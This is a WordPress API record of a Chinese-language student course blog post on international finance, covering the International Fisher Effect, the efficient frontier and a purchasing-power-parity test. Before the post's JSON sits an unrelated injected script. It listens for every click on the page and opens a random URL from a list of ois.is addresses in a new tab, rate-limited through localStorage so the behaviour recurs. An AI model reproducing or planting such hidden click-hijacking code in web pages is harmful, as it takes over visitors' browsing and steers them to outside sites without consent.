<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":928,"date":"2023-02-16T16:33:21","date_gmt":"2023-02-16T08:33:21","guid":{"rendered":"https:\/\/edu.secda.info\/scu8154128\/?p=928"},"modified":"2023-02-20T18:41:11","modified_gmt":"2023-02-20T10:41:11","slug":"%e7%ac%ac%e4%b8%80%e9%80%b1%e4%b8%8a%e8%aa%b2","status":"publish","type":"post","link":"https:\/\/edu.secda.info\/scu8154128\/?p=928","title":{"rendered":"\u7b2c\u4e00\u9031\u4e0a\u8ab2"},"content":{"rendered":"<p>\u958b\u5b78\u7b2c\u4e00\u9031\uff0c\u7b2c\u4e00\u6b21\u4e0a\u570b\u969b\u8ca1\u7ba1\u9019\u5802\u8ab2\uff0c\u539f\u672c\u4e0a\u5b78\u671f\u5c31\u60f3\u5148\u4fee\u4e86\uff0c\u7d50\u679c\u6709\u4e8b\u60c5\u5361\u5230\u4e0a\u8ab2\u6642\u9593\u4e86\uff0c\u9019\u5b78\u671f\u7279\u5730\u7a7a\u4e0b\u6642\u9593\uff0c\u6c92\u60f3\u5230\u662f\u9060\u8ddd\u4e0a\u8ab2\u6b38!<\/p>\n<p>&nbsp;<\/p>\n<p><strong>\u570b\u969b\u8cbb\u96ea\u6548\u61c9\uff08International Fisher Effect\uff09<\/strong>\u6240\u8868\u9054\u7684\u662f\u5169\u570b\u8ca8\u5e63\u7684\u532f\u7387\u8207\u5169\u570b\u8cc7\u672c\u5e02\u5834\u5229\u7387\u4e4b\u9593\u7684\u95dc\u4fc2\u3002\u5b83\u8a8d\u70ba\u5373\u671f\u532f\u7387\u7684\u8b8a\u52d5\u5e45\u5ea6\u8207\u5169\u570b\u5229\u7387\u4e4b\u5dee\u76f8\u7b49\uff0c\u4f46\u65b9\u5411\u76f8\u53cd\u3002<\/p>\n<p>\u7406\u89e3\u570b\u5bb6\u9593\u540d\u7fa9\u5229\u7387\u7684\u76f8\u5c0d\u8b8a\u5316\u5c0d\u67d0\u570b\u8ca8\u5e63\u50f9\u503c\u7684\u5f71\u97ff\uff0c\u95dc\u9375\u5728\u65bc\u7406\u89e3<strong>\u8cfc\u8cb7\u529b\u5e73\u50f9\u7406\u8ad6<\/strong>\u548c<strong>\u8cbb\u96ea\u6548\u61c9<\/strong>\u7684\u5167\u6db5\u3002\u8cfc\u8cb7\u529b\u5e73\u50f9\u7406\u8ad6\u544a\u8a34\u6211\u5011\uff0c\u532f\u7387\u7684\u8b8a\u52d5\u5c07\u6703\u62b5\u6d88\u901a\u8ca8\u81a8\u8139\u5dee\u7570\u7684\u5f71\u97ff\u3002\u56e0\u6b64\uff0c\u672c\u570b\u7684\u901a\u8ca8\u81a8\u8139\u7387\u76f8\u5c0d\u5916\u570b\u7684\u901a\u8ca8\u81a8\u8139\u7387\u4e0a\u5347\uff0c\u5247\u610f\u5473\u8457\u672c\u5e63\u8cb6\u503c\uff0c\u540c\u6642\u4e5f\u610f\u5473\u8457\u672c\u570b\u7684\u5229\u7387\u76f8\u5c0d\u65bc\u5916\u570b\u5229\u7387\u4e0a\u5347\u3002\u5c07\u9019\u5169\u500b\u689d\u4ef6\u7d9c\u5408\u8d77\u4f86\uff0c\u5c31\u5f97\u5230\u4e86<strong>\u570b\u969b\u8cbb\u96ea\u6548\u61c9<\/strong>\u3002<\/p>\n<p>\u516c\u5f0f\uff1a\u00a0<strong>(S1-S2)\/S2=id-if<\/strong><\/p>\n<p>\u5176\u4e2dS1\u662f\u7576\u524d\u5373\u671f\u532f\u7387\uff0cS2\u662f\u4e00\u5b9a\u6642\u9593\u7d50\u675f\u5f8c\u7684\u5373\u671f\u532f\u7387\uff0cid\u662f\u570b\u5167\u8cc7\u672c\u5e02\u5834\u5229\u7387\uff0cif\u70ba\u570b\u5916\u5229\u7387\u3002<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-929\" src=\"https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/02\/img024-300x225.gif\" alt=\"\" width=\"300\" height=\"225\" \/><\/p>\n<p>\u5716\u7247\u8cc7\u6599\u4f86\u6e90:<\/p>\n<p><a href=\"https:\/\/si.secda.info\/scu05354023\/?p=992\">https:\/\/si.secda.info\/scu05354023\/?p=992<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><iframe loading=\"lazy\" title=\"\u8521\u5b50\u7693\u8001\u5e2b \u8ca1\u52d9\u7ba1\u7406(\u4e0a) Ch 01-1 \u7dd2\u8ad6\" src=\"https:\/\/www.youtube.com\/embed\/QNylPWitep4\" width=\"650\" height=\"500\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">\ufeff<\/span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">\ufeff<\/span><\/iframe><\/p>\n<p>\u8cc7\u6599\u4f86\u6e90:<\/p>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=QNylPWitep4\">https:\/\/www.youtube.com\/watch?v=QNylPWitep4<\/a><\/p>\n<p><strong>\u6548\u529b\u524d\u7de3<\/strong><\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-939\" src=\"https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/02\/WbMdo7L-300x169.png\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/02\/WbMdo7L-300x169.png 300w, https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/02\/WbMdo7L-800x450.png 800w, https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/02\/WbMdo7L-768x432.png 768w, https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/02\/WbMdo7L.png 1400w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>\u6548\u7387\u524d\u7de3\u7684\u4e3b\u8981\u610f\u7fa9\u662f\u300c\u7e3d\u98a8\u96aa\u76f8\u540c\u6642\uff0c\u76f8\u5c0d\u4e0a\u53ef\u7372\u5f97\u6700\u9ad8\u7684\u9810\u671f\u5831\u916c\u7387\u300d\u6216\u300c\u9810\u671f\u5831\u916c\u76f8\u540c\u6642\uff0c\u76f8\u5c0d\u4e0a\u7e3d\u98a8\u96aa\u6700\u4f4e\u300d\u7684\u6295\u8cc7\u7d44\u5408\u3002<\/p>\n<p>\u6211\u5011\u6295\u8cc7\u4e00\u5b9a\u8003\u91cf\u5230\u98a8\u96aa\u8207\u5831\u916c\uff0c\u7576\u627f\u53d7\u4e0d\u540c\u7684\u98a8\u96aa\u9ede\u6642\uff0c\u5728\u6bcf\u4e00\u500b\u98a8\u96aa\u9ede\u4e00\u5b9a\u6703\u6709\u4e00\u500b\u6295\u8cc7\u7d44\u5408\uff0c\u53ef\u4ee5\u9054\u5230\u6700\u5927\u6295\u8cc7\u5831\u916c\u7387\uff0c\u9019\u4e9b\u4e0d\u540c\u98a8\u96aa\u9ede\u6240\u9054\u5230\u6700\u9ad8\u5831\u916c\u7387\u6240\u7d44\u6210\u7684\u4e00\u689d\u66f2\u7dda\u5c31\u662fEfficient Frontier\u3002<\/p>\n<p>\u5716\u7247\u8cc7\u6599\u4f86\u6e90:<\/p>\n<p><a href=\"https:\/\/pgfinnote.com\/efficient-frontier\/\">https:\/\/pgfinnote.com\/efficient-frontier\/<\/a><\/p>\n<p><strong>ppp\u5be6\u8b49<\/strong><\/p>\n<p>PPP\u5be6\u8b49\u662f\u75282015\/09~2018\/03\u7684\u6708\u8cc7\u659930\u7b46<\/p>\n<p>\u81eaTEJ\u64f7\u53d6\u65e5\u5143\u8cb7\u5165(bid)\u3001\u53f0\u7063\u901a\u81a8\u7387\u3001\u65e5\u672c\u901a\u81a8\u7387<\/p>\n<p>(Id-If)\/(1+If) \u8207 [E(S1)-S0]\/S0\u2013&gt;\u532f\u7387\u8b8a\u52d5\u7387\uff0c\u505a\u51fa\u5716\u5f62(\u5982\u4e0b\u5716)<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-942\" src=\"https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/02\/PPP-300x182.jpg\" alt=\"\" width=\"300\" height=\"182\" srcset=\"https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/02\/PPP-300x182.jpg 300w, https:\/\/edu.secda.info\/scu8154128\/wp-content\/uploads\/2023\/02\/PPP.jpg 722w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>\u8cc7\u6599\u4f86\u6e90:<\/p>\n<p><a href=\"https:\/\/si.secda.info\/scu03154106\/?p=1197\">https:\/\/si.secda.info\/scu03154106\/?p=1197<\/a><\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u958b\u5b78\u7b2c\u4e00\u9031\uff0c\u7b2c\u4e00\u6b21\u4e0a\u570b\u969b\u8ca1\u7ba1\u9019\u5802\u8ab2\uff0c\u539f\u672c\u4e0a\u5b78\u671f\u5c31\u60f3\u5148\u4fee\u4e86\uff0c\u7d50\u679c\u6709\u4e8b\u60c5\u5361\u5230\u4e0a\u8ab2\u6642\u9593<\/p>\n","protected":false},"author":15,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=\/wp\/v2\/posts\/928"}],"collection":[{"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=928"}],"version-history":[{"count":8,"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=\/wp\/v2\/posts\/928\/revisions"}],"predecessor-version":[{"id":948,"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=\/wp\/v2\/posts\/928\/revisions\/948"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=928"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=928"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154128\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=928"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}